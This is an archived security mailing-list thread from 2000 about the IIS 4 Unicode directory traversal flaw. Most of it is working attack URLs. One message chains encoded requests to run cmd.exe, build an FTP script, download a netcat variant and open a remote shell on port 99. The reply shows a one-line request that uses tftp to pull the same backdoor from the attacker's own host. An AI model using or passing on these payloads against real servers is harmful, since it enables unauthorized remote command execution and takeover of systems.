OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: dos commands via iis 4
From: Nikolaou, Dinos (dreamerDARKNESS.GR)
Date: Fri Nov 10 2000 - 12:27:04 CST

Greetings all,
        Why to bother so much adding usernames and password to files,
while you can just use, the tftp that already exist at every
winnt\system32 directory. Just

http://www.site.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe%20-i%20
my.nice.host.co.uk%20GET%20ncx99.exe+c:\winnt\system32\ncx99.exe

Where ncx99.exe a variation of netcat for windows. You will have just to
run a tftpd server at your host.

Regards,
Nick Krassas
dreamerdarkness.gr

On Thu, 9 Nov 2000, RayW, CISSP wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello All,
>
>
> or you could really have fun with a command line dos shell :)
>
>
> http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..
> \..\winnt\system32\ftp.exe+ftp2.exe
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+open%20ftp.site.com+>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+username+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+userpassword+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+get%20ncx99.exe+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+quit+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ftp2.exe?-s:fil
> e
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ncx99.exe?
>
>
> then telnet to www.site.com port 99 and you have a shell on the local
> machine, granted limited access
> but that is just another step.....I will leave up to you all.
>
>
> Regards,
>
>
> RayW, CISSP